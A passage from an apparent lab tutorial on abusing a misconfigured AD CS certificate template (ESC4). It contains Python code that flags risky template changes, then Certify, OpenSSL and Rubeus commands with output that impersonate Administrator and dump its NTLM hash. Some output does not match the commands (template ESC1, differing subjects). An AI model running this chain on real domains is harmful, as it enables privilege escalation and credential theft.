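def risk_increasing_changes(baseline, current):
    """Changes that move the template toward ESC1, each labelled with the step it matches."""
    risks = []
    old_ef, new_ef = u32(baseline["mspki-enrollment-flag"]), u32(current["mspki-enrollment-flag"])
    if old_ef & CT_FLAG_PEND_ALL_REQUESTS and not new_ef & CT_FLAG_PEND_ALL_REQUESTS:
        risks.append("manager approval disabled (PEND_ALL_REQUESTS cleared)")
    if current["mspki-ra-signature"] < baseline["mspki-ra-signature"]:
        risks.append(f"authorized signatures lowered {baseline['mspki-ra-signature']} -> {current['mspki-ra-signature']}")
    old_nf, new_nf = u32(baseline["mspki-certificate-name-flag"]), u32(current["mspki-certificate-name-flag"])
    if not old_nf & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and new_nf & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        risks.append("ENROLLEE_SUPPLIES_SUBJECT set (requester may choose the SAN)")
    for attr in EKU_ATTRS:
        added = (set(current[attr]) - set(baseline[attr])) & AUTH_OIDS
        if added:
            risks.append(f"authentication OID added to {attr}: {sorted(added)}")
        if baseline[attr] and not current[attr]:
            risks.append(f"{attr} emptied (no EKU means any purpose)")
    new_enrollers = set(current["enrollment_principals"]) - set(baseline["enrollment_principals"])
    if new_enrollers:
        risks.append(f"new Enroll principals: {sorted(new_enrollers)}")
    new_controllers = set(current["control_principals"]) - set(baseline["control_principals"])
    if new_controllers:
        risks.append(f"new object-control principals: {sorted(new_controllers)}")
    return risks


# Constructed snapshots (my reconstruction of the Certify output before and after the changes)
NON_AUTH_EKUS = ["1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4"]   # Encrypting File System, Secure Email
PRINCIPALS = {
    "enrollment_principals": ["LAB\\Domain Admins", "LAB\\Domain Users", "LAB\\Enterprise Admins"],
    "control_principals": ["LAB\\Administrator", "LAB\\blwasp", "LAB\\Domain Admins", "LAB\\Enterprise Admins"],
}
BASELINE = {
    "mspki-enrollment-flag": 0x1 | 0x8 | CT_FLAG_AUTO_ENROLLMENT,   # INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    "mspki-ra-signature": 0,
    "mspki-certificate-name-flag": -1509949440,   # SUBJECT_*_REQUIRE_* bits only, stored signed
    "pkiextendedkeyusage": NON_AUTH_EKUS,
    "mspki-certificate-application-policy": NON_AUTH_EKUS,
    **PRINCIPALS,
}
CURRENT = {
    "mspki-enrollment-flag": 9,
    "mspki-ra-signature": 0,
    "mspki-certificate-name-flag": 1,
    "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.2"],
    "mspki-certificate-application-policy": ["1.3.6.1.5.5.7.3.2"],
    **PRINCIPALS,
}

if __name__ == "__main__":
    print("changed:", changed_attributes(BASELINE, CURRENT))
    for line in risk_increasing_changes(BASELINE, CURRENT):
        print("RISK:", line)
```

On these snapshots four attributes changed but only three changes raise risk: the name flag now lets the enrollee supply the subject, and an authentication OID was added to both EKU attributes. The enrollment-flag change from 0x29 to 9 is reported as a change but not as a risk, because PEND_ALL_REQUESTS was never set on this template (Requires Manager Approval was already False in the Certipy output), and the re-granted Enroll right for Domain Users is not new either. Running the same function after a restore from the saved configuration should return an empty list, which is the check worth doing before closing out an engagement.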
If we now run Certify with the /vulnerable option, the ESC4 template is listed as well:
Finding vulnerable templates
PS C:\Tools> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[!] Vulnerable Certificates Templates :
<SNIP>
CA Name : LAB-DC.lab.local\lab-LAB-DC-CA
Template Name : ESC4
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication
mspki-certificate-application-policy : Client Authentication
Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
All Extended Rights : LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
Full Control Principals : LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
WriteOwner Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteDacl Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteProperty Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
<SNIP>
Now let's request the certificate and save it in a file named admin-esc4.pem:
Certificate Request with alternative SAN
PS C:\Tools> .\Certify.exe request /ca:LAB-DC\lab-LAB-DC-CA /template:ESC4 /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : LAB\grace
[*] No subject name specified, using current context as subject.
[*] Template : ESC1
[*] Subject : CN=Grace Start, CN=Users, DC=lab, DC=local
[*] AltName : administrator@lab.local
[*] Certificate Authority : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 58
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAsrll8PDAN0okTiQRzYX1lsbU5D9nazZX4O0lAehrddfPZbJH
8gI37syxrjmlgYOwumXOeHf5Q1o9iQgfXDg0/60uS2+P6ZzbPmSrYLpaE5ougrPw
RvswDeeEMYfrDElQ3TLno1qvpQkce1iawndc+pM/AmMbpJvg7YEy1BJN2z8nYVkV
6TQq3ggMVKIcuIJeOlHX+wV47n/xhFmDqHTd6+VNsn01g2kyR6tsUyhh/JfjrPoU
2o2It9gtcyb0dHeJQPPTsOk/9b9r96ncHw4dNNhWNcd66OHPR9cAgqBO7M7lMjKp
B2pW6cXaf4b6J84IYpDovVwvh4mE+yqk0FMDJQIDAQABAoIBAAYXn8v4yPSZiGdJ
<SNIP>
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:04.1419031
Next, we must use OpenSSL to convert the certificate to PFX format. Save the cert.pem output above in a file named admin-esc4.pem and convert it to admin-esc4.pfx:
Convert Certificate
PS C:\Tools> & "C:\Program Files\OpenSSL-Win64\bin\openssl.exe" pkcs12 -in admin-esc4.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin-esc4.pfx
Enter Export Password:
Verifying - Enter Export Password:
Now, we can authenticate using Rubeus and the certificate we generated. We use the asktgt action with the option /user:Administrator, the user whose name we placed in the alternative SAN, the certificate file with the option /certificate:admin-esc4.pfx, and /getcredentials to retrieve the NT hash:
Certificate Authentication
PS C:\Tools> .\Rubeus.exe asktgt /user:administrator /certificate:admin-esc4.pfx /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Black Wasp, CN=Users, DC=lab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'lab.local\administrator'
[*] Using domain controller: fe80::42d5:b682:fe30:8453%18:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQjCCBj6gAwIBBaEDAgEWooIFWzCCBVdhggVTMIIFT6ADAgEFoQsbCUxBQi5MT0NBTKIeMBygAwIB
AqEVMBMbBmtyYnRndBsJbGFiLmxvY2Fso4IFGTCCBRWgAwIBEqEDAgECooIFBwSCBQM92Iu/a6xQue9F
74688JB9XlNJdBcv+fOqSgjmgBMAlnp4Ch3k0tOcP33kcZgO7NG1Wyc9M1gKxlw/rG/c2BrxVPTrgCb4
y6DRnBVjxs5VWT6KEK7vJeRcuu4qE5DB97iKpkHTg+s7QsHEMC/uf7ASn8krj+piYkthng4zpAc9/Z5e
Ac8O5yB7XnHaqK9ob7oot5piHJMROv1PH60HA1SQZHhK6MxID28nJjeGtg8TTH9bnkpnAyymnTg/y58E
2sXyqwGJeSmUnbv07ZEvujCEDShvGwBKayBHekF5gwRbRCezL9Yr8moLCf2Pv7Fy7Eix/oaQ4QQUatKi
53+hT+aQn8IHFboGJQwFnpupGN6/lFi/LKyZDibv6fjOn7qur2uMU/iulVFRr8E+foDFjGjFpDcRk5go
ZLxYpGWSvFLiyNPbcU8OxPvpklH9S4q+cesxQ2CAi6jZD3AL4A0Xn3u6xVvbudnQ8VFivEiUfo9tmafS
<SNIP>
ServiceName : krbtgt/lab.local
ServiceRealm : LAB.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : LAB.LOCAL
StartTime : 20/11/2023 23:52:52
EndTime : 21/11/2023 09:52:52
RenewTill : 27/11/2023 23:52:52
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 9WJNhDk0VPXy9KrKX3fs9w==
ASREP (key) : 61FE317BC89BC6EB06524E5421986165
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE